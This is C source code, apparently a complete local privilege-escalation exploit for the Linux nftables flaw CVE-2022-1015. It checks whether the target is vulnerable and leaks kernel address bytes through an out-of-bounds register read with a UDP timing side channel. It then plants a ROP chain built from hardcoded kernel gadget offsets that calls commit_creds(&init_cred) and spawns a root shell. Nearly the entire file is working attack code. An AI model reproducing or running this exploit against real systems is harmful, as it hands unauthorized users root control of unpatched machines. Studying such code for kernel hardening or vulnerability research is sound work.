/*
 * ----------------------------------------------------------------------------
 * "THE BEER-WARE LICENSE" (Revision 42):
 * David Bouman (pql) wrote this file.  As long as you retain this notice you
 * can do whatever you want with this stuff. If we meet some day, and you think
 * this stuff is worth it, you can buy me a beer in return.   Signed, David.
 * ----------------------------------------------------------------------------
 */

#define _GNU_SOURCE 1
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <linux/limits.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>

#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>

#include "helpers.h"

/*
 * Result of calc_vuln_expr_params(): a length window plus the encoded
 * value the search settled on.
 */
struct vuln_expr_params {
    uint32_t min_len; /* lower length bound; never below the min_len the caller asked for */
    uint32_t max_len; /* upper length bound; never above the max_len the caller asked for */
    uint32_t value;   /* encoded value; callers in this file pass it on to the rule_add_* helpers */
};


void setup_nftables(struct mnl_socket* nl, char* table_name, char* base_chain_name, int* seq)
{
    if (create_table(nl, table_name, AF_INET, seq, NULL) == -1) {
        perror("Failed creating table");
        exit(EXIT_FAILURE);
    }

    printf("[+] Created nft %s\n", table_name);

    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_LOCAL_OUT;
    bp.prio = 10;

    if (create_chain(nl, table_name, base_chain_name, NFPROTO_IPV4, &bp, seq, NULL)) {
            perror("Failed creating base chain");
            exit(EXIT_FAILURE);
    }

    printf("[+] Created base ipv4 chain %s\n", base_chain_name);
}

/*
 * Search for a 32-bit value whose low byte equals `desired` and whose
 * product with 4 (truncated to 32 bits) plus `max_len` still reaches 2^32.
 *
 * The search starts at 2^(32 - shift) - 1 (capped at 0xfffffffb) and counts
 * downwards. It gives up as soon as the truncated product plus max_len drops
 * below 2^32.
 *
 * On success fills *result and returns 0:
 *   min_len = max(min_len, 2^32 - product)
 *   max_len = min(max_len, (2^32 - product) + 0x50)
 *   value   = found value + 4
 * Returns -1 when no matching value exists in the searched range.
 */
static int calc_vuln_expr_params_div(struct vuln_expr_params* result, uint8_t desired, uint32_t min_len, uint32_t max_len, int shift)
{
    const uint64_t wrap_point = (uint64_t)1 << 32;

    uint32_t candidate = (uint32_t)(((uint64_t)1 << (32 - shift)) - 1);
    if (candidate == 0xffffffff) {
        candidate = 0xfffffffb; // max actual value
    }

    for (;; candidate--) {
        // candidate * 4, truncated to 32 bits and then widened
        const uint64_t scaled = (uint32_t)(candidate * 4);

        // Once the sum no longer reaches 2^32 there is nothing left to find.
        if (scaled + (uint64_t)max_len < wrap_point) {
            return -1;
        }

        if ((candidate & 0xff) != desired) {
            continue;
        }

        // Both bounds derive from the unclamped distance to 2^32.
        const uint32_t lower = (uint32_t)(wrap_point - scaled);
        const uint32_t upper = lower + 0x50;

        result->max_len = (max_len < upper) ? max_len : upper;
        result->min_len = (min_len > lower) ? min_len : lower;
        result->value = candidate + 4;
        return 0;
    }
}

/*
 * Try calc_vuln_expr_params_div() with shift 0, 1 and 2 in that order and
 * stop at the first one that succeeds.
 *
 * Returns 0 with *result filled in, or -1 if all three attempts fail.
 */
static int calc_vuln_expr_params(struct vuln_expr_params *result, uint8_t desired, uint32_t min_len, uint32_t max_len)
{
    int shift = 0;

    while (shift < 3) {
        if (calc_vuln_expr_params_div(result, desired, min_len, max_len, shift) == 0) {
            return 0;
        }
        shift++;
    }

    return -1;
}

/* 8-byte marker expected at the start of the payload of packets this file sends. */
#define MAGIC 0xdeadbeef0badc0de
/*
 * Build the filtering rule for `chain_name` and submit it in one batch.
 *
 * The rule consists of, in order:
 *   1. load the UDP destination port into register 8
 *   2. compare it for equality with port 9999 (network byte order)
 *   3. load the first 8 bytes of the inner header into register 8
 *   4. compare them for equality with MAGIC
 *   5. a goto verdict targeting the chain named "aux_chain"
 *
 * Returns whatever send_batch_request() returns.
 */
int create_base_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    uint16_t port_be = htons(9999);
    uint64_t magic_value = MAGIC;

    struct nftnl_rule* rule = build_rule(table_name, chain_name, family, handle);

    // Destination port: 2 bytes at offsetof(struct udphdr, dest) in the
    // transport header. Restricting on it keeps unrelated traffic, including
    // packets sent by our own server socket, away from the later expressions.
    // The server sockets actually have a different stack layout than the
    // client sockets in do_chain, so this is essential.
    rule_add_payload(rule, NFT_PAYLOAD_TRANSPORT_HEADER, offsetof(struct udphdr, dest), sizeof(uint16_t), 8);
    rule_add_cmp(rule, NFT_CMP_EQ, 8, &port_be, sizeof port_be);

    // Failsafe: the first 8 payload bytes must carry the magic marker so that
    // only packets we actually want to process get any further.
    rule_add_payload(rule, NFT_PAYLOAD_INNER_HEADER, 0, 8, 8);
    rule_add_cmp(rule, NFT_CMP_EQ, 8, &magic_value, sizeof magic_value);

    // Packets that passed both comparisons continue in the auxiliary chain.
    rule_add_immediate_verdict(rule,  NFT_GOTO, "aux_chain");

    // Commit rule to the kernel
    int rc = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&rule, seq,
        NULL
    );

    return rc;
}

int create_infoleak_rule(
    struct mnl_socket* nl, struct nftnl_rule* r, uint8_t cmp, uint8_t pos, uint16_t family, int* seq, int extraflags)
{

    struct vuln_expr_params vuln_params;

    // index 0xff translates to +0x3fc, and there's a kernel address that we can grab.

    if (calc_vuln_expr_params(&vuln_params, 0xff,  0x40, 0x40)) {
        puts("Could not find correct params to trigger OOB read.");
        return -1;
    }

    // we shift by pos*8 so that the first byte of the register will be the one at pos `pos`.
    uint32_t shift_amt = (pos * 8);
    rule_add_bit_shift(r, NFT_BITWISE_RSHIFT, vuln_params.min_len, vuln_params.value, 1, &shift_amt, sizeof shift_amt);
    
    // we compare it to the constant - we can binary search
    
    // if the compared value is greater than our supplied value,
    // we accept the packet. Else, we drop it.

    rule_add_cmp(r, NFT_CMP_GT, 0x15, &cmp, 1);

    rule_add_immediate_verdict(r, NF_DROP, NULL);

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE | extraflags, family, (void**)&r, seq,
        NULL
    );
}

/* Handle of the rule that do_leak_byte() replaces on every iteration. */
#define INFOLEAK_RULE_HANDLE 4
/*
 * Determine one byte by binary search over the comparison operand.
 *
 * Each round replaces the rule with handle INFOLEAK_RULE_HANDLE in
 * `aux_chain_name` by one comparing against the current midpoint, sends a
 * MAGIC-prefixed 16-byte datagram to `addr` and waits for a reply:
 *   - reply "MSG_OK"  -> byte <= mid
 *   - receive error   -> byte >  mid (treated as a timeout)
 *
 * client_sock is expected to have a receive timeout configured by the
 * caller; without one the receive would block.
 *
 * Returns the byte once the bounds meet. Exits the process if the rule
 * cannot be replaced, on a zero-length receive, or on an unexpected reply.
 */
uint8_t do_leak_byte(struct mnl_socket* nl, int client_sock, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, uint8_t pos, int* seq)
{

    uint8_t low = 0;
    uint8_t high = 255;

    char msg[16] = {0};
    char result[16] = {0};

    // Copy the marker bytewise: writing through a uint64_t* into a char
    // array is an aliasing (and potentially alignment) violation.
    const uint64_t magic = MAGIC;
    memcpy(msg, &magic, sizeof magic);

    for (;;) {

        uint8_t mid = (high + low) / 2;

        printf("bounds (inclusive): [0x%.2hhx, 0x%.2hhx]\n", low, high);

        if (low == high) {
            return mid;
        }

        // Create a rule that replaces the rule with handle INFOLEAK_RULE_HANDLE
        struct nftnl_rule* r = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
        nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);

        // The replacement rule compares against the current midpoint.
        if (create_infoleak_rule(nl, r, mid, pos, NFPROTO_IPV4, seq, NLM_F_REPLACE)) {
            perror("Could not replace infoleak rule");
            exit(EXIT_FAILURE);
        }

        // NOTE(review): the send result is deliberately not treated as fatal;
        // presumably the call can report an error when the packet is dropped
        // by the rule. Confirm before adding a check here.
        (void)sendto(client_sock, msg, sizeof msg, 0, (struct sockaddr*)addr, sizeof *addr);

        struct sockaddr_in presumed_server_addr;
        socklen_t presumed_server_addr_len = sizeof presumed_server_addr;

        // Receive at most sizeof result - 1 bytes so the zeroed last byte
        // always terminates the string handed to strcmp().
        ssize_t nrecv = recvfrom(client_sock, result, sizeof result - 1, 0, (struct sockaddr*)&presumed_server_addr, &presumed_server_addr_len);
        if (nrecv == 0) {
            puts("[-] Remote socket closed...");
            exit(EXIT_FAILURE);
        } else if (nrecv < 0) {

            // In case of timeout, value is greater than `mid`
            low = mid + 1;
        } else {
            if (strcmp(result, "MSG_OK")) {
                puts("[-] Something went wrong...");
                exit(EXIT_FAILURE);
            }
            memset(result, 0, sizeof result);

            // But if we get a response, the packet arrived at the server and therefore the value is lower than or equal to mid

            high = mid;
        }
    }
}

/*
 * Recover bytes 1..3 of a 32-bit value by calling do_leak_byte() once per
 * byte position. Byte 0 is never probed and stays 0 in the result.
 *
 * A UDP client socket is bound to CLIENT_HOST:CLIENT_PORT and given a
 * receive timeout for the duration of the call.
 *
 * Returns the four result bytes reinterpreted as a uint32_t in host byte
 * order, or (uint32_t)-1 if the client socket could not be set up.
 */
uint32_t do_leak(struct mnl_socket* nl, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, int* seq)
{

    #define CLIENT_HOST "127.0.0.1"
    #define CLIENT_PORT 8888

    int client_sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (client_sock < 0) {
        perror("client socket");
        return (uint32_t)-1;
    }

    // Zero everything (including sin_zero) before filling in the fields.
    struct sockaddr_in client_addr = {
        .sin_family = AF_INET,
        .sin_port = htons(CLIENT_PORT),
    };
    inet_aton(CLIENT_HOST, &client_addr.sin_addr);

    if (bind(client_sock, (struct sockaddr*)&client_addr, sizeof client_addr) < 0) {
        perror("client bind");
        close(client_sock);
        return (uint32_t)-1;
    }

    // 200ms receive timeout (SO_RCVTIMEO takes a struct timeval, i.e.
    // seconds + microseconds).
    // can probably be lower
    struct timeval timeout = {.tv_sec = 0, .tv_usec = 1000 * 200};
    if (setsockopt(client_sock, SOL_SOCKET, SO_RCVTIMEO, &timeout, sizeof timeout) < 0) {
        // Without the timeout do_leak_byte() would block on its first miss.
        perror("client setsockopt");
        close(client_sock);
        return (uint32_t)-1;
    }

    uint8_t results[4] = {0};

    for (int i = 1; i < 4; ++i) {
        results[i] = do_leak_byte(nl, client_sock, addr, table_name, aux_chain_name, i, seq);
        printf("[+] Leaked byte %i: %.2hhx\n", i, results[i]);
    }

    close(client_sock);

    // memcpy instead of a pointer cast: same bytes, no aliasing violation.
    uint32_t leaked;
    memcpy(&leaked, results, sizeof leaked);
    return leaked;

}

/*
 * Receive datagrams on `fd` forever, printing the sender and a hexdump of
 * each one.
 *
 * Returns -1 when recvfrom() reports an error or a zero-length datagram;
 * there is no other exit from the loop. The descriptor is not closed here.
 */
int simple_handler(int fd)
{
    char buf[4096] = {0};
    struct sockaddr_in client_addr = {0};

    for (;;) {

        // The length argument is value-result: reset it before every call so
        // a shorter address written earlier cannot truncate a later one.
        socklen_t client_addr_size = sizeof client_addr;

        int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);

        if (len <= 0) {
            // printf() may overwrite errno; keep the value for perror().
            int saved_errno = errno;
            printf("listener receive failed..\n");
            errno = saved_errno;
            perror("");
            return -1;
        }

        printf("Received message from [%s:%d] (udp) (0x%x bytes):\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), len);
        hexdump(buf, len, 8);
    }
}


/*
 * Receive datagrams on `fd` forever and answer each one with the 7 bytes
 * of "MSG_OK" (terminating NUL included), sent back to the address the
 * datagram came from.
 *
 * Returns -1 when recvfrom() reports an error or a zero-length datagram;
 * there is no other exit from the loop. The descriptor is not closed here.
 */
int leak_handler(int fd)
{
    char buf[4096] = {0};
    char send_back[] = "MSG_OK";
    struct sockaddr_in client_addr = {0};

    for (;;) {

        // The length argument is value-result: reset it before every call so
        // a shorter address written earlier cannot truncate a later one.
        socklen_t client_addr_size = sizeof client_addr;

        int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);

        if (len <= 0) {
            // printf() may overwrite errno; keep the value for perror().
            int saved_errno = errno;
            printf("listener receive failed..\n");
            errno = saved_errno;
            perror("");
            return -1;
        }

        // Best-effort reply; a failed send is not reported.
        (void)sendto(fd, send_back, sizeof(send_back), 0, (struct sockaddr*)&client_addr, client_addr_size);
    }
}

/*
 * Assigned in main() to an address 0x3ff0 bytes into a 0x4000-byte
 * anonymous read/write mapping. Nothing in this file reads it —
 * presumably it is consumed by code outside this file; TODO confirm.
 */
void* new_stack;

/* This is where we return after our rop chain */
/*
 * NOTE(review): _after_rop is only declared here; neither a definition nor
 * a use is visible in this file.
 */
extern void _after_rop();
/*
 * Run `id` followed by `sh` through system(). main() calls this directly
 * once trigger_rop() has returned. The results of system() are ignored.
 */
void after_rop()
{

    system("id");
    system("sh");
    
}

static int install_rop_chain_rule(struct mnl_socket* nl, uint64_t kernel_base, char* chain, int* seq)
{
   
    // return address is at regs.data[0xca]
    struct vuln_expr_params v;
    
    if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
        puts("[-] Cannot find suitable parameters for planting ROP chain.");
        return -1;
    }  
    
    struct nftnl_rule* r = build_rule("exploit_table", chain, NFPROTO_IPV4, NULL);
    //nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
    rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
    
    
    int err = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, NFPROTO_IPV4, (void**)&r, seq,
        NULL
    );
    
    if (err) {
        perror("send_batch_request");
        return err;
    }
    
    return v.max_len;

}

/*
 * Assemble the packet that carries the chain and send it to `magic_addr`
 * over a freshly created UDP socket.
 *
 * Packet layout: 8 zero bytes followed by up to `rop_length` bytes of
 * 64-bit entries, each computed as kernel_base plus one of the offsets
 * defined below (or a literal 0 for padding). The whole rop_length + 8
 * byte buffer is sent, so unused trailing entries stay zero.
 *
 * nl is accepted but not used by this function.
 *
 * NOTE(review): the offsets below are fixed constants; presumably they are
 * only valid for one specific kernel build — confirm before reuse.
 * NOTE(review): the results of calloc(), socket() and sendto() are not
 * checked, and neither the buffer nor the socket is released here.
 * NOTE(review): every #define in this body stays visible for the rest of
 * the translation unit.
 */
void trigger_rop(struct mnl_socket* nl, uint64_t kernel_base, struct sockaddr_in* magic_addr, int rop_length)
{

    // Structures in .data
    #define INIT_NSPROXY_OFF 0x1867360
    #define INIT_PID_NS_OFF 0x1866fe0
    #define INIT_CRED_OFF 0x18675a0

    // Routines in .text
    #define SWITCH_TASK_NAMESPACES_OFF 0xd1040
    #define COMMIT_CREDS_OFF 0xd2430
    #define FIND_TASK_BY_VPID_OFF 0x0c8c80
    #define BPF_GET_CURRENT_TASK_OFF 0x1ebde0
    #define __DO_SOFTIRQ_OFF 0x1000000
    
    // Gadgets
    #define MOV_RDI_RAX_OFF 0xc032fb // constraint: rcx==0
    #define POP_RDI_OFF 0x92610
    #define POP_RSI_OFF 0x676d2
    #define POP_RCX_OFF 0x139a3
    #define POP_RBP_OFF 0x6ffa8d
    #define XOR_ECX_ECX_OFF 0x7110bf
    #define MOV_R13_RCX_POP_RBP_OFF 0xaf089b
    #define POP_R11_R12_RBP_OFF 0x054645
    #define CLI_OFF 0x4df88b
    #define STI_OFF 0xc061c0
    #define MOV_RCX_RAX_OFF 0x2faad4
    #define SWAPGS_SYSRETQ_OFF 0xe000fb
    // Misc.
    #define OLD_TASK_FLAGS_OFF 0x1a554a // 0x40010000

    // Zero-filled buffer: one leading 8-byte slot plus rop_length bytes.
    uint64_t *packet = calloc(1, rop_length + 8);

    packet[0] = 0;
    uint64_t* rop = &packet[1];


    // 0xffffffff819d5cda <__netif_receive_skb_one_core+122> ret
    
    int i = 0;
    // Append one 64-bit entry; exits the process if the entry would not fit
    // into rop_length bytes.
    #define _rop(x) do { if ((i+1)*8 > rop_length) { puts("ROP TOO LONG"); exit(EXIT_FAILURE);} rop[i++] = (x); } while (0)

    // clear interrupts
    _rop(kernel_base + CLI_OFF);
    
    // make rbp-0x58 point to 0x40010000
    _rop(kernel_base + POP_RBP_OFF);
    _rop(kernel_base + OLD_TASK_FLAGS_OFF + 0x58);
    
    /* Cleanly exit softirq and return to syscall context */
    _rop(kernel_base + __DO_SOFTIRQ_OFF + 418);
    
    // stack frame was 0x60 bytes
    for(int j = 0; j < 12; ++j) _rop(0);

    /* We're already on 128 bytes here */

    // switch_task_namespaces(current, &init_nsproxy)
    _rop(kernel_base + BPF_GET_CURRENT_TASK_OFF);
    _rop(kernel_base + MOV_RDI_RAX_OFF); // rcx happens to already be 0
    _rop(kernel_base + POP_RSI_OFF);
    _rop(kernel_base + INIT_NSPROXY_OFF);
    _rop(kernel_base + SWITCH_TASK_NAMESPACES_OFF);

    // commit_cred(&init_cred)
    _rop(kernel_base + POP_RDI_OFF);
    _rop(kernel_base + INIT_CRED_OFF);
    _rop(kernel_base + COMMIT_CREDS_OFF);

    // pass control to system call stack
    // this is offset +0xc0 from our rop chain
    // target is at   +0x168
    _rop(kernel_base + 0x28b2e4); // add rsp, 0x90; pop rbx; pop rbp; ret

    int s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    puts("Triggering payload..");
    sendto(s, packet, rop_length + 8, 0, (struct sockaddr*)magic_addr, sizeof *magic_addr);
}

int main(int argc, char** argv, char** envp)
{

    if (argc < 2) {
        puts("[+] Dropping into network namespace");
        
        // We're too lazy to perform uid mapping and such.
        char* new_argv[] = {
            "/usr/bin/unshare",
            "-Urn",
            argv[0],
            "EXPLOIT",
            NULL
        };

        execve(new_argv[0], new_argv, envp);
        puts("Couldn't start unshare wrapper..");
        puts("Recompile the exploit with an appropriate unshare path.");
        exit(EXIT_FAILURE);
    }
    if (strcmp("EXPLOIT", argv[1])) {
        puts("[-] Something went wrong...");
        exit(EXIT_FAILURE);
    }

    // I'm too lazy to talk to NETLINK_ROUTE..
    // Deal with it!
    system("ip link set dev lo up");

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);

    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("[-] mnl_socket_bind");
        puts("[-] Are you sure you have CAP_NET_ADMIN?..");
        exit(EXIT_FAILURE);
    }
    int seq = time(NULL);
    int err;

    char *table_name = "exploit_table", 
         *base_chain_name = "base_chain",
         *aux_chain_name = "aux_chain";

    setup_nftables(nl, table_name, base_chain_name, &seq);
    
    if (create_chain(nl, table_name, aux_chain_name, NFPROTO_IPV4, NULL, &seq, NULL)) {
            perror("Failed creating auxiliary chain");
            exit(EXIT_FAILURE);
    }
    printf("[+] Created auxiliary chain %s\n", aux_chain_name);

    if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) {
        perror("Failed creating base chain rule");
        exit(EXIT_FAILURE);
    }

    puts("[+] Created base chain rule");
    
    // we need to make a rule first in order to replace it
    // in our leaky rule creation. it's a bit of a hack but it works
    // We can also use it to determine whether the system is vulnerable
    // before actually exploiting.
    
    struct vuln_expr_params v;
    
    // offset 0xca and len 0xff is OOB
    if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
        puts("[-] Something went horribly wrong...");
        exit(EXIT_FAILURE);
    }  
    
    struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
    rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);

    err = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, NFPROTO_IPV4, (void**)&aux_rule, &seq,
        NULL
    );

    if (err) {
        puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET);
        exit(EXIT_FAILURE);
    }

    puts("[+] Succesfully created rule with OOB nft_payload!");
    puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET);
    puts("[+] Type 'y' to try exploiting the target.");
    puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET);
    
    char a[4] = {};
    read(0, a, 1);

    if (a[0] != 'y') {
        puts("Bye!");
        exit(EXIT_SUCCESS);   
    }

    #define SERVER_HOST "127.0.0.1"
    #define SERVER_PORT 9999

    int pid = setup_listener(SERVER_HOST, SERVER_PORT, leak_handler);
    
    struct sockaddr_in server;
    inet_aton(SERVER_HOST, &server.sin_addr);
    server.sin_port = htons(SERVER_PORT);
    server.sin_family = AF_INET;

    #define LEAK_BASE_OFFSET 0x9ac3ec
    uint32_t leak = do_leak(nl, &server, table_name, aux_chain_name, &seq);
    // first byte might fail due to buggy carry implementation with shift_amt = 0
    // so we just set it. The LSB will always remain constant.

    uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff);
    uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET;
    
    
    // If the kernel base isn't aligned we should probably not continue.
    if((kernel_base & 0xfffff) != 0) {
        puts("[-] Leak failed.");
        puts("[-] Try changing offsets / lengths / chain types.");
        puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP");
        exit(EXIT_FAILURE);
    }

    printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
    stop_listener(pid);
    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_LOCAL_IN;
    bp.prio = 10;

    if (create_chain(nl, table_name, "base_chain_2", NFPROTO_IPV4, &bp, &seq, NULL)) {
        perror("Failed adding second base chain");
        exit(EXIT_FAILURE);
    }

    err = install_rop_chain_rule(nl, kernel_base, "base_chain_2", &seq);
    if (err < 0) {
        perror("[-] Could not install ROP chain");
        exit(EXIT_FAILURE);
    };

    new_stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) + 0x3ff0;
    trigger_rop(nl, kernel_base, &server, err);
    after_rop();
}
